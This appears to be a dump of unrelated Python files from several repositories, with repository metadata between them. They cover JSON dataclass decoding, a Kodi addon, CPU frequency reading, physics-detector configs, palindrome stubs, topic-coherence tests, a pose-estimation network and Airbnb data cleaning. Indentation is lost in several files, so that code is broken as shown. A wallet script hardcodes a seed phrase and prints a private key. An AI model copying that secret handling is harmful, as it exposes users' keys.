cls.from_dict = classmethod(DataClassJsonMix.from_dict.__func__)
cls.schema = classmethod(DataClassJsonMix.schema.__func__)
cls.__init__ = _handle_undefined_parameters_safe(cls, kvs=(), usage="init")
# register cls as a virtual subclass of DataClassJsonMixin
DataClassJsonMixin.register(cls)
return cls
def _decode_dataclass(cls, kvs, infer_missing):
if isinstance(kvs, cls):
return kvs
overrides = _user_overrides_or_exts(cls)
kvs = {} if kvs is None and infer_missing else kvs
field_names = [field.name for field in fields(cls)]
decode_names = _decode_letter_case_overrides(field_names, overrides)
kvs = {decode_names.get(k, k): v for k, v in kvs.items()}
missing_fields = {field for field in fields(cls) if field.name not in kvs}
for field in missing_fields:
if field.default is not MISSING:
kvs[field.name] = field.default
elif field.default_factory is not MISSING:
kvs[field.name] = field.default_factory()
elif infer_missing:
kvs[field.name] = None
# Perform undefined parameter action
kvs = _handle_undefined_parameters_safe(cls, kvs, usage="from")
init_kwargs = {}
types = get_type_hints(cls)
for field in fields(cls):
# The field should be skipped from being added
# to init_kwargs as it's not intended as a constructor argument.
if not field.init:
continue
field_value = kvs[field.name]
field_type = types[field.name]
if _is_supported_generic(field_type) and field_type.__args__[0]!=str:
type_param = 'type' in [f.name for f in fields(field_type.__args__[0])]
elif 'type' in field_names:
type_param = True
else:
type_param = False
if field_value is None and not _is_optional(field_type):
warning = (f"value of non-optional type {field.name} detected "
f"when decoding {cls.__name__}")
if infer_missing:
warnings.warn(
f"Missing {warning} and was defaulted to None by "
f"infer_missing=True. "
f"Set infer_missing=False (the default) to prevent this "
f"behavior.", RuntimeWarning)
else:
pass
init_kwargs[field.name] = field_value
continue
while True:
if not _is_new_type(field_type):
break
field_type = field_type.__supertype__
if (field.name in overrides
and overrides[field.name].decoder is not None):
# FIXME hack
if field_type is type(field_value):
init_kwargs[field.name] = field_value
else:
init_kwargs[field.name] = overrides[field.name].decoder(
field_value)
elif is_dataclass(field_type):
# FIXME this is a band-aid to deal with the value already being
# serialized when handling nested marshmallow schema
# proper fix is to investigate the marshmallow schema generation
# code
if is_dataclass(field_value):
value = field_value
else:
value = _decode_dataclass(field_type, field_value,
infer_missing)
init_kwargs[field.name] = value
elif _is_supported_generic(field_type) and field_type != str and not type_param:
init_kwargs[field.name] = _decode_generic(field_type,
field_value,
infer_missing)
elif _is_supported_generic(field_type) and field_type.__args__[0] != str and type_param:
init_kwargs[field.name] = _decode_generic_subsets(field_type,
field_value,
infer_missing)
else:
init_kwargs[field.name] = _support_extended_types(field_type,
field_value)
return cls(**init_kwargs)
def _decode_generic_subsets(type_, value, infer_missing):
if value is None:
res = value
elif _issubclass_safe(type_, Enum):
# Convert to an Enum using the type as a constructor.
# Assumes a direct match is found.
res = type_(value)
# FIXME this is a hack to fix a deeper underlying issue. A refactor is due.
elif _is_collection(type_):
if _is_mapping(type_):
k_type, v_type = getattr(type_, "__args__", (Any, Any))
# a mapping type has `.keys()` and `.values()`
# (see collections.abc)
ks = _decode_dict_keys(k_type, value.keys(), infer_missing)
vs = _decode_items(v_type, value.values(), infer_missing)
xs = zip(ks, vs)
else:
xs = (_decode_dataclass(getSubclass(type_,v), v, infer_missing)
for v in value)
# get the constructor if using corresponding generic type in `typing`
# otherwise fallback on constructing using type_ itself
try:
res = _get_type_cons(type_)(xs)
except (TypeError, AttributeError):
res = type_(xs)
else: # Optional or Union
if not hasattr(type_, "__args__"):
# Any, just accept
res = value
elif _is_optional(type_) and len(type_.__args__) == 2: # Optional
type_arg = type_.__args__[0]
if is_dataclass(type_arg) or is_dataclass(value):
res = _decode_dataclass(type_arg, value, infer_missing)
elif _is_supported_generic(type_arg):
res = _decode_generic(type_arg, value, infer_missing)
else:
res = _support_extended_types(type_arg, value)
else: # Union (already decoded or unsupported 'from_json' used)
res = value
return res
def getSubclass(cls, values):
"""
    If the target dataclass has a field called `type`, look up the concrete
    subclass whose `type` value matches the one given in `values`.
"""
    subclass_map = {subclass.type: subclass
                    for subclass in cls.__args__[0].__subclasses__()}
try:
return subclass_map[values['type']]
except KeyError:
raise Exception("Type "+values['type']+" not available.")
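def _get_subclass_sketch():
    """A minimal illustrative sketch of getSubclass; the _Shape/_Circle dataclasses
    are hypothetical and exist only for this example.
    """
    from typing import List
    @dataclass
    class _Shape:
        type: str = ""
    @dataclass
    class _Circle(_Shape):
        type: str = "Circle"
    return getSubclass(List[_Shape], {"type": "Circle"})  # resolves to _Circle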
@dataclass
class YamlDataClassConfig(DataClassJsonMix, metaclass=ABCMeta):
"""This class implements YAML file load function."""
def load(self, path: str, path_is_absolute: bool = False):
"""
This method loads from YAML file to properties of self instance.
Args:
path: The path in string form; can be relative or absolute.
path_is_absolute: indicates whether the path is an absolute path
"""
path_type=Path(path)
built_path = build_path(path_type, path_is_absolute)
if os.path.exists(path):
if path.endswith('.yaml'):
with built_path.open('r', encoding='UTF-8') as yml:
                    dictionary_config = yaml.safe_load(yml)
else:
raise InvalidTypeError("Configuration file must "
"be in YAML format: %s"
% str(built_path))
else:
raise NotFoundError("No such file or directory: %s"
% str(built_path))
self.__dict__.update(
self.schema().load(dictionary_config).__dict__
) | 1.84375 | 2 |
acunetix/v11/db/tables/licenses.py | BenDerPan/DScaner | 20 | 12795738 | # uncompyle6 version 2.13.2
# Python bytecode 3.5 (3351)
# Decompiled from: Python 3.5.3 (default, Jan 19 2017, 14:11:04)
# [GCC 6.3.0 20170118]
# Embedded file name: db\tables\licenses.py
from sqlalchemy import *
from sqlalchemy.orm import mapper
from db.tables import metadata
LicensesTable = Table('licenses', metadata, Column('license_key', TEXT, primary_key=True))
class LicenseRow(object):
license_key = None
def __init__(self, license_key):
self.license_key = license_key
def __str__(self):
return 'R_license[%s]' % (self.license_key,)
def __repr__(self):
return self.__str__()
mapper(LicenseRow, LicensesTable) | 2.234375 | 2 |
resources/common_variables.py | enen92/script.retrogames | 3 | 12795739 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
Author: enen92
License: I don't care version 3.0
"""
import xbmc,xbmcgui,xbmcaddon,os
addon_id = 'script.retrogames'
selfAddon = xbmcaddon.Addon(id=addon_id)
datapath = xbmc.translatePath(selfAddon.getAddonInfo('profile')).decode('utf-8')
addonfolder = xbmc.translatePath(selfAddon.getAddonInfo('path')).decode('utf-8')
artfolder = os.path.join(addonfolder,'resources','img')
msgok = xbmcgui.Dialog().ok
platformsave= os.path.join(datapath,'folders.txt')
def translate(text):
return selfAddon.getLocalizedString(text).encode('utf-8')
| 2.078125 | 2 |
python/freq/getfreqs.py | pherna06/server-consumption | 1 | 12795740 | <filename>python/freq/getfreqs.py
from cpufreq import cpuFreq
# CPU control setup
cpu = cpuFreq()
# Get and check current frequencies.
freqs = cpu.get_frequencies()
if not freqs:
print("No frequency reads available.")
exit()
# Print frecuencies by CPU.
print("CPU frequencies (KHz):")
[ print(f"CPU {core}: {freqs[core]}") for core in sorted(freqs) ] | 3.4375 | 3 |
DQM/CSCMonitorModule/python/csc_dqm_masked_hw_cfi.py | ckamtsikis/cmssw | 852 | 12795741 | <reponame>ckamtsikis/cmssw<filename>DQM/CSCMonitorModule/python/csc_dqm_masked_hw_cfi.py<gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
#--------------------------
# Masked HW Elements
#--------------------------
CSCMaskedHW = cms.untracked.vstring(
# == Post LS1 - All ME4/2 chambers should be enabled
# == mask most or ME+4/2 chambers, except 9,10,11,12,13
#'1,4,2,1,*,*,*',
#'1,4,2,2,*,*,*',
#'1,4,2,3,*,*,*',
#'1,4,2,4,*,*,*',
#'1,4,2,5,*,*,*',
#'1,4,2,6,*,*,*',
#'1,4,2,7,*,*,*',
#'1,4,2,8,*,*,*',
#'1,4,2,14,*,*,*',
#'1,4,2,15,*,*,*',
#'1,4,2,16,*,*,*',
#'1,4,2,17,*,*,*',
#'1,4,2,18,*,*,*',
#'1,4,2,19,*,*,*',
#'1,4,2,20,*,*,*',
#'1,4,2,21,*,*,*',
#'1,4,2,22,*,*,*',
#'1,4,2,23,*,*,*',
#'1,4,2,24,*,*,*',
#'1,4,2,25,*,*,*',
#'1,4,2,26,*,*,*',
#'1,4,2,27,*,*,*',
#'1,4,2,28,*,*,*',
#'1,4,2,29,*,*,*',
#'1,4,2,30,*,*,*',
#'1,4,2,31,*,*,*',
#'1,4,2,32,*,*,*',
#'1,4,2,33,*,*,*',
#'1,4,2,34,*,*,*',
#'1,4,2,35,*,*,*',
#'1,4,2,36,*,*,*',
# == mask all ME-4/2 chambers
#'2,4,2,*,*,*,*',
)
| 1.25 | 1 |
pymake/__init__.py | CallumJHays/pymake | 1 | 12795742 | from .cache import TimestampCache
from .cli import cli
from .decorator import makes
from .environment import env, PATH
from .shell import sh
from .make import make, make_sync
from .targets import Makefile, Target, Dependencies, Group
from pathlib import Path
__FLAG_IS_PYMAKEFILE__ = True
__all__ = ["TimestampCache", "cli", "makes", "env", "PATH", "Path",
"sh", "make", "make_sync", "__FLAG_IS_PYMAKEFILE__",
"Makefile", "Target", "Dependencies", "Group"]
| 1.773438 | 2 |
superclasses/invetory.py | augusnunes/titanic-escape | 0 | 12795743 |
# player inventory
class Inventory:
    '''Class that represents the player's inventory
'''
def __init__(self):
self.itens = []
        self.nomes = [] ### implement this
def add(self, item):
if type(item) == list:
for i in item:
self.itens.append(i)
self.nomes.append(i.name)
else:
self.itens.append(item)
self.nomes.append(item.name)
def remove(self, name):
for i in range(len(self.itens)):
if self.nomes[i] == name:
self.nomes.pop(i)
self.itens.pop(i)
return True
return False
def check(self, nome_do_item):
'''
        Checks whether an item is in the inventory
        nome_do_item: str
'''
return nome_do_item in self.nomes
def __str__(self):
title = "\nSeu inventário contém os seguintes itens:\n"
return title + "\n".join(['-'+i for i in self.nomes]) | 3.78125 | 4 |
manager.py | CipherWang/ckb-address-manager | 2 | 12795744 | <gh_stars>1-10
# -*- coding: UTF-8 -*-
from bip_utils import Bip39ChecksumError, Bip39Languages, Bip39MnemonicValidator
from bip_utils import Bip39SeedGenerator
from bip_utils.bip.bip44_base import Bip32
from address import generateShortAddress, CODE_INDEX_SECP256K1_SINGLE, ckbhash
from hashlib import sha256
# load mnemonic & generate seed bytes
mnemonic = "comfort rough close flame uniform chapter unique announce miracle debris space like"
seed_bytes = Bip39SeedGenerator(mnemonic).Generate()
# generate HD root key, ckb path is m/44'/309'/0'/change_or_not/child
bip32_ctx = Bip32.FromSeed(seed_bytes)
bip32_ctx = bip32_ctx.DerivePath("44'/309'/0'/0")
# get childkey at specific location
child_id_uint32 = 220342
child_key = bip32_ctx.ChildKey(child_id_uint32)
sk = child_key.PrivateKey().Raw().ToHex()
pk = child_key.PublicKey().RawCompressed().ToHex()
# generate address
blake160_args = ckbhash(bytes.fromhex(pk))[:40]
address = generateShortAddress(CODE_INDEX_SECP256K1_SINGLE, blake160_args, 'mainnet')
print("Sub Key at %d is:\nPrivatekey = %s\nAddress = %s" % (child_id_uint32, sk, address)) | 1.914063 | 2 |
exercises/palindrome-products/palindrome_products.py | wonhyeongseo/python | 2 | 12795745 | <reponame>wonhyeongseo/python<gh_stars>1-10
def largest_palindrome(max_factor, min_factor):
pass
def smallest_palindrome(max_factor, min_factor):
pass
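# A minimal sketch of one way the stubs above could be filled in; the expected return
# format (palindrome value plus its factor pairs) is an assumption based on the usual
# exercise specification.
def _palindrome_products_sketch(min_factor, max_factor):
    products = {}
    for a in range(min_factor, max_factor + 1):
        for b in range(a, max_factor + 1):
            p = a * b
            if str(p) == str(p)[::-1]:
                products.setdefault(p, []).append([a, b])
    return products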
| 2.375 | 2 |
tests/test_palmetto.py | zojabutenko/palmetto-py | 23 | 12795746 | """Test Palmetto."""
import pytest
from palmettopy.palmetto import Palmetto
from palmettopy.exceptions import CoherenceTypeNotAvailable, EndpointDown, WrongContentType
@pytest.fixture
def words():
"""Load test data fixture."""
words = ["cake", "apple", "banana", "cherry", "chocolate"]
return words
@pytest.fixture
def words_underscore():
"""Load test data fixture."""
words = ['label', 'type', 'character', 'foundation_garment']
return words
@pytest.fixture
def words_no_results():
"""Load test data fixture."""
words = ['label', 'type', 'character', 'subject', 'discipline', 'topic', 'national', 'familycolor', 'fam', 'glotto', 'isoexception']
return words
def test_get_coherence(capsys, words):
palmetto = Palmetto()
coherence = palmetto.get_coherence(words)
assert(coherence == 0.5678879445677241)
def test_get_coherence_fast(capsys, words):
palmetto = Palmetto()
coherence = palmetto.get_coherence_fast(words)
assert(coherence == 1779.6591356383024)
def test_wrong_endpoint(words):
palmetto = Palmetto("http://example.com/nothinghere/")
with pytest.raises(EndpointDown):
coherence = palmetto.get_coherence(words)
def test_wrong_coherence_type(words):
palmetto = Palmetto()
with pytest.raises(CoherenceTypeNotAvailable):
coherence = palmetto.get_coherence(words, coherence_type="asdf")
def test_all_coherence_types(words):
palmetto = Palmetto()
for coherence_type in palmetto.all_coherence_types:
palmetto.get_coherence(words, coherence_type=coherence_type)
def test_wrong_content_type(words):
palmetto = Palmetto()
with pytest.raises(WrongContentType):
palmetto._request_by_service(words, "cv", "bla")
def test_all_content_types(words):
palmetto = Palmetto()
for content_type in ["text", "bytes"]:
palmetto._request_by_service(words, "umass", content_type)
def test_get_df_for_words(words):
palmetto = Palmetto()
doc_ids = palmetto.get_df_for_words(words)
for i in range(0, len(words)):
assert(doc_ids[i][0] == words[i])
def test_get_df_for_words_underscore(words_underscore):
"""
    Known to fail: Palmetto cannot handle underscores in the input words.
"""
palmetto = Palmetto()
doc_ids = palmetto.get_df_for_words(words_underscore)
for i in range(0, len(words_underscore)):
assert(doc_ids[i][0] == words_underscore[i])
def test_get_df_for_words_with_no_results(words_no_results):
"""
    Known to fail: Palmetto returns no results for some of these words.
"""
palmetto = Palmetto()
doc_ids = palmetto.get_df_for_words(words_no_results)
for i in range(0, len(words_no_results)):
assert(doc_ids[i][0] == words_no_results[i])
| 2.40625 | 2 |
example/LSTMPoseMchine/converted/network_convert.py | ddddwee1/SULT | 18 | 12795747 | import model3 as M
import numpy as np
import tensorflow as tf
params = np.load('lstmpm_d1.npy', allow_pickle=True).item()
params2 = np.load('lstmpm_d2.npy', allow_pickle=True).item()
def get_conv(name):
res = []
# print(params[name])
res.append(params[name]['weights'])
res.append(params[name]['bias'])
# print(res[0].shape)
return res
def get_conv2(name):
res = []
# print(params[name])
res.append(params2[name]['weights'])
res.append(params2[name]['bias'])
# print(res[0].shape)
return res
class Stage0(M.Model):
def initialize(self):
# init encoding
self.c1_s1 = M.ConvLayer(9, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('conv1_stage1'))
self.p1_s1 = M.MaxPool(3, 2, pad='VALID')
self.c2_s1 = M.ConvLayer(9, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('conv2_stage1'))
self.p2_s1 = M.MaxPool(3, 2, pad='VALID')
self.c3_s1 = M.ConvLayer(9, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('conv3_stage1'))
self.p3_s1 = M.MaxPool(3, 2, pad='VALID')
self.c4_s1 = M.ConvLayer(5, 32, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('conv4_stage1'))
self.c5_s1 = M.ConvLayer(9, 512, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('conv5_stage1'))
self.c6_s1 = M.ConvLayer(1, 512, activation=M.PARAM_RELU, values=get_conv('conv6_stage1'))
self.c7_s1 = M.ConvLayer(1, 15, values=get_conv('conv7_stage1'))
# frame encoding
self.c1_s2 = M.ConvLayer(9, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('conv1_stage2'))
self.p1_s2 = M.MaxPool(3, 2, pad='VALID')
self.c2_s2 = M.ConvLayer(9, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('conv2_stage2'))
self.p2_s2 = M.MaxPool(3, 2, pad='VALID')
self.c3_s2 = M.ConvLayer(9, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('conv3_stage2'))
self.p3_s2 = M.MaxPool(3, 2, pad='VALID')
self.c4_s2 = M.ConvLayer(5, 32, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('conv4_stage2'))
# center map
self.pool = M.AvgPool(9,8, pad='VALID')
# LSTM0
self.g = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv('g_x_stage2'))
self.gb = tf.convert_to_tensor(params['g_stage2'][1].astype(np.float32))
self.gb = tf.Variable(self.gb)
self.i = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv('i_x_stage2'))
self.ib = tf.convert_to_tensor(params['i_stage2'][1].astype(np.float32))
self.ib = tf.Variable(self.ib)
self.o = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv('o_x_stage2'))
self.ob = tf.convert_to_tensor(params['o_stage2'][1].astype(np.float32))
self.ob = tf.Variable(self.ob)
# decoder branch
self.mc1 = M.ConvLayer(11, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('Mconv1_stage2'))
self.mc2 = M.ConvLayer(11, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('Mconv2_stage2'))
self.mc3 = M.ConvLayer(11, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv('Mconv3_stage2'))
self.mc4 = M.ConvLayer(1, 128, activation=M.PARAM_RELU, values=get_conv('Mconv4_stage2'))
self.mc5 = M.ConvLayer(1, 15, values=get_conv('Mconv5_stage2'))
def forward(self, dt1, dt2, centermap):
#init enc
e = dt1
e = self.c1_s1(e)
e = tf.pad(e, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
e = self.p1_s1(e)
e = self.c2_s1(e)
e = tf.pad(e, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
e = self.p2_s1(e)
e = self.c3_s1(e)
e = tf.pad(e, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
e = self.p3_s1(e)
e = self.c4_s1(e)
e = self.c5_s1(e)
e = self.c6_s1(e)
e = self.c7_s1(e)
# frame encoding
f = dt2
f = self.c1_s2(f)
f = tf.pad(f, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
f = self.p1_s2(f)
f = self.c2_s2(f)
f = tf.pad(f, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
f = self.p2_s2(f)
f = self.c3_s2(f)
f = tf.pad(f, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
f = self.p3_s2(f)
f = self.c4_s2(f)
# centermap pooling
x = tf.pad(centermap, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
x = self.pool(x)
# LSTM branch
x = tf.concat([f, e, x], axis=-1)
g = self.g(x) + self.gb
i = self.i(x) + self.ib
o = self.o(x) + self.ob
g = tf.tanh(g)
i = tf.sigmoid(i)
o = tf.sigmoid(o)
c = g * i
h = o * tf.tanh(c)
# decoder branch
x = self.mc1(h)
x = self.mc2(x)
x = self.mc3(x)
x = self.mc4(x)
out = self.mc5(x)
return out
class Stage1(M.Model):
def initialize(self):
# frame encoding
self.c1_s2 = M.ConvLayer(9, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv2('conv1_stage2'))
self.p1_s2 = M.MaxPool(3, 2, pad='VALID')
self.c2_s2 = M.ConvLayer(9, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv2('conv2_stage2'))
self.p2_s2 = M.MaxPool(3, 2, pad='VALID')
self.c3_s2 = M.ConvLayer(9, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv2('conv3_stage2'))
self.p3_s2 = M.MaxPool(3, 2, pad='VALID')
self.c4_s2 = M.ConvLayer(5, 32, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv2('conv4_stage2'))
# center map
self.pool = M.AvgPool(9,8, pad='VALID')
# lstm
self.gx = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv2('g_x_stage3'))
self.gh = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv2('g_h_stage3'))
self.gb = tf.convert_to_tensor(params2['g_stage3'][1].astype(np.float32))
self.gb = tf.Variable(self.gb)
self.fx = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv2('f_x_stage3'))
self.fh = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv2('f_h_stage3'))
self.fb = tf.convert_to_tensor(params2['f_stage3'][1].astype(np.float32))
self.fb = tf.Variable(self.fb)
self.ox = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv2('o_x_stage3'))
self.oh = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv2('o_h_stage3'))
self.ob = tf.convert_to_tensor(params2['o_stage3'][1].astype(np.float32))
self.ob = tf.Variable(self.ob)
self.ix = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv2('i_x_stage3'))
self.ih = M.ConvLayer(3, 48, pad='SAME_LEFT', values=get_conv2('i_h_stage3'))
self.ib = tf.convert_to_tensor(params2['i_stage3'][1].astype(np.float32))
self.ib = tf.Variable(self.ib)
# decoder branch
self.mc1 = M.ConvLayer(11, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv2('Mres1_stage3'))
self.mc2 = M.ConvLayer(11, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv2('Mres2_stage3'))
self.mc3 = M.ConvLayer(11, 128, pad='SAME_LEFT', activation=M.PARAM_RELU, values=get_conv2('Mres3_stage3'))
self.mc4 = M.ConvLayer(1, 128, activation=M.PARAM_RELU, values=get_conv2('Mres4_stage3'))
self.mc5 = M.ConvLayer(1, 15, values=get_conv2('Mres5_stage3'))
def forward(self, x, hmap, centermap, h, c):
# frame encoding
f = x
f = self.c1_s2(f)
f = tf.pad(f, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
f = self.p1_s2(f)
f = self.c2_s2(f)
f = tf.pad(f, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
f = self.p2_s2(f)
f = self.c3_s2(f)
f = tf.pad(f, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
f = self.p3_s2(f)
f = self.c4_s2(f)
# centermap pooling
ce = tf.pad(centermap, [[0,0],[0,1],[0,1],[0,0]], mode='SYMMETRIC')
ce = self.pool(ce)
# lstm branch
x = tf.concat([f, hmap, ce], axis=-1)
gx = self.gx(x)
gh = self.gh(h)
ox = self.ox(x)
oh = self.oh(h)
fx = self.fx(x)
fh = self.fh(h)
ix = self.ix(x)
ih = self.ih(h)
g = tf.tanh(gx + gh + self.gb)
o = tf.sigmoid(ox + oh + self.ob)
i = tf.sigmoid(ix + ih + self.ib)
f = tf.sigmoid(fx + fh + self.fb)
c = f*c + i*g
h = o * tf.tanh(c)
# decoder branch
x = self.mc1(h)
x = self.mc2(x)
x = self.mc3(x)
x = self.mc4(x)
out = self.mc5(x)
return out
class ModelBundle(M.Model):
def initialize(self):
self.s0 = Stage0()
self.s1 = Stage1()
if __name__=='__main__':
mods = ModelBundle()
mod = mods.s0
x = np.ones([1,368,368,3]).astype(np.float32)
cent = np.ones([1,368,368,1]).astype(np.float32)
x = mod(x, x, cent)
out = np.transpose(x,[0,3,1,2])
print(out)
print(out.shape)
input('Test deploy1 finished. Input for testing deploy2')
mod = mods.s1
x = np.ones([1,368,368,3]).astype(np.float32)
cent = np.ones([1,368,368,1]).astype(np.float32)
h = c = np.ones([1,46,46, 48]).astype(np.float32)
hmap = np.ones([1,46,46, 15]).astype(np.float32)
x[:,-1] = 0
x = mod(x, hmap, cent, h, c)
out = np.transpose(x,[0,3,1,2])
print(out)
print(out.shape)
input('Test deploy2 finished. Input for saving converted weights ')
saver = M.Saver(mods)
saver.save('./LSTMPM/lstmpm.ckpt')
| 2.34375 | 2 |
src/analysis/analysis.py | burakbalaban/airbnb_project | 0 | 12795748 | <reponame>burakbalaban/airbnb_project
import sys
import numpy as np
import pandas as pd
import xgboost as xgb
from numba import jit
from numba import prange
from sklearn.model_selection import RandomizedSearchCV
from bld.project_paths import project_paths_join as ppj
def list_generator(keyword):
"""Function for getting the variable names from txt file
and converting into a list.
Args:
keyword (str): the name of txt file
Returns:
the list of variable names
"""
with open(ppj("IN_SPECS", keyword + ".txt"), "r") as f:
var_read = f.read()
return list(var_read.split("\n"))
def rule_func(var_list, dataset, rule):
"""Function for applying data management rule on dataset with given variable names.
Variable names should match with dataset's column names.
Defined rules are exclusion, conversion and length generation.
Exclusion(exclude) rule excludes variable from the dataset.
Conversion(convert) rule converts "f" and "t" values into 0 and 1 respectively.
Thus variable should have values either "f" or "t".
Length generator(lengthen) rule gets the string lenght,
adds "_len" to variable name and exclude variable from dataset.
Args:
| var_list (list): list of variables to apply
| dataset (pd.Dataframe): dataset to implement the rule
| rule (str): can take values 'exclude', 'convert' or 'lengthen'
Returns:
the altered dataset (pd.Dataframe)
"""
if rule == "exclude":
dataset = dataset.drop(var_list, axis=1)
elif rule == "convert":
for c in var_list:
dataset[c] = dataset[c].replace({"f": 0, "t": 1})
elif rule == "lengthen":
for l in var_list:
dataset[l + "_len"] = dataset[l].str.len()
dataset = dataset.drop(l, axis=1)
else:
raise ValueError("Rule is not defined")
return dataset
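def _rule_func_sketch():
    """A minimal illustrative sketch of rule_func on a toy frame; the column names
    and values here are made up for the example only.
    """
    toy = pd.DataFrame({"name": ["Cosy flat"], "host_is_superhost": ["t"]})
    toy = rule_func(["host_is_superhost"], toy, "convert")  # "t" -> 1
    toy = rule_func(["name"], toy, "lengthen")  # adds "name_len", drops "name"
    return toy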
@jit(nopython=True)
def distance_calc(house, venue):
"""Function for calculating the distance between
a house and a venue while taking world's shape into consideration.
Args:
| house (list): list including latitude and longitude of a house
| venue (list): list including latitude and longitude of a venue
Returns:
the approximate distance (float)
"""
# approximate radius of earth in km
R = 6373.0
house_lat = np.deg2rad(house[0])
house_lng = np.deg2rad(house[1])
venue_lat = np.deg2rad(venue[0])
venue_lng = np.deg2rad(venue[1])
dist = (
np.sin((venue_lat - house_lat) / 2) ** 2
+ np.cos(house_lat)
* np.cos(venue_lat)
* np.sin((venue_lng - house_lng) / 2) ** 2
)
return 2 * R * np.arcsin(np.sqrt(dist))
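def _distance_calc_sketch():
    """A minimal sanity check of distance_calc with two arbitrary Berlin-area
    coordinates; the result should be roughly 1.5 km.
    """
    house = np.array([52.52, 13.405])
    venue = np.array([52.53, 13.42])
    return distance_calc(house, venue)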
def score_func(house_data, venue_data):
"""Function for calculating location-based score of a house.
Function gets a house and venues within 1 km radius of that house,
calculates each venue's influential score on that house with dividing
venue's check-in count with the distance.
With that division, score is adjusted to popularity and distance.
In the end, that house's score is the mean of relevant venues' influential scores.
Args:
| house_data (pd.Dataframe): airbnb dataset including house features
especially latitude, longitude
| venue_data (pd.Dataframe): dataset with venues' latitude, longitude
and check_in_counts
Returns:
house_data with additional column called location_score (pd.Dataframe)
"""
    # pack venue coordinates and check-in counts into an array for the distance computation
venue_data_list = np.array(
list(zip(venue_data.latitude, venue_data.longitude, venue_data.check_in_counts))
)
house_data_coordinate = np.array(
list(zip(house_data.latitude, house_data.longitude))
)
    def numba_func(venue_data_list, house_data_coordinate):
        """Inner function collecting the per-house scores (kept separate for numba).
        """
        scores_out = np.empty(len(house_data_coordinate))
        for house in prange(len(house_data_coordinate)):
            # Preliminary elimination based on coordinates (~1 km bounding box)
            red_venue_list = np.array(
                list(
                    filter(
                        lambda x: (
                            abs(x[0] - house_data_coordinate[house][0]) < 0.01  # latitude
                        )
                        & (abs(x[1] - house_data_coordinate[house][1]) < 0.01),  # longitude
                        venue_data_list,
                    )
                )
            )
            score_list = []
            for ven in prange(len(red_venue_list)):
                cal_dist = distance_calc(
                    house_data_coordinate[house], red_venue_list[ven][0:2]
                )
                if cal_dist < 1:  # venues closer than 1 km
                    score_list.append(red_venue_list[ven][2] / cal_dist)
            # houses with no nearby venue get a score of 0
            scores_out[house] = np.mean(np.array(score_list)) if score_list else 0.0
        return scores_out
    location_score_list = numba_func(venue_data_list, house_data_coordinate)
house_data["location_score"] = location_score_list
return house_data
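def _score_func_sketch():
    """A minimal illustrative sketch of score_func on two toy frames; the coordinates
    and check-in count are made up for the example only.
    """
    houses = pd.DataFrame({"latitude": [52.520], "longitude": [13.405]})
    venues = pd.DataFrame(
        {"latitude": [52.521], "longitude": [13.406], "check_in_counts": [100]}
    )
    return score_func(houses, venues)  # adds a "location_score" column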
def dummy_func(data, column_list):
"""Function for creating dummy variable columns out of defined columns.
Created dummy columns have the name of source column as prefix and "_".
Function drops the source column from the dataset.
Args:
| data (pd.Dataframe): dataset of interest contaning columns with categorical data
| column_list (list): list of columns to get dummy variables
Returns:
the altered dataset with dummy variable columns (pd.Dataframe)
"""
for column in column_list:
temp_data = pd.get_dummies(data[column]).add_prefix(str(column + "_"))
data = data.drop(column, axis=1)
data = pd.concat([data, temp_data], axis=1)
return data
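def _dummy_func_sketch():
    """A minimal illustrative sketch of dummy_func; the resulting columns are prefixed
    with the source column name and an underscore.
    """
    toy = pd.DataFrame({"room_type": ["Private room", "Entire home/apt"]})
    return dummy_func(toy, ["room_type"])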
def data_management(date, venue_data, g_data):
"""Function for data management.
It loads the airbnb dataset and rearranges both airbnb and generated
dataset for prediction.
    A certain number of house features are excluded; the list can be found
    in src/specs/var_exclude.txt.
In addition, for some features only the length is considered,
similarly listed in src/specs/var_len.txt.
Args:
| date (str): a part of airbnb dataset's name also indicating scraping date
| venue_data (pd.Dataframe): the dataset including venues' information
| g_data (pd.Dataframe): randomly generated house features for prediction
Returns:
| data (pd.Dataframe): the cleared, ready-for-modelling, dataset
| g_data (pd.Dataframe): the altered generated data
"""
with open(ppj("IN_DATA", "Airbnb_data/" + date + "_listings.csv"), "rb") as d:
data = pd.read_csv(d, low_memory=False)
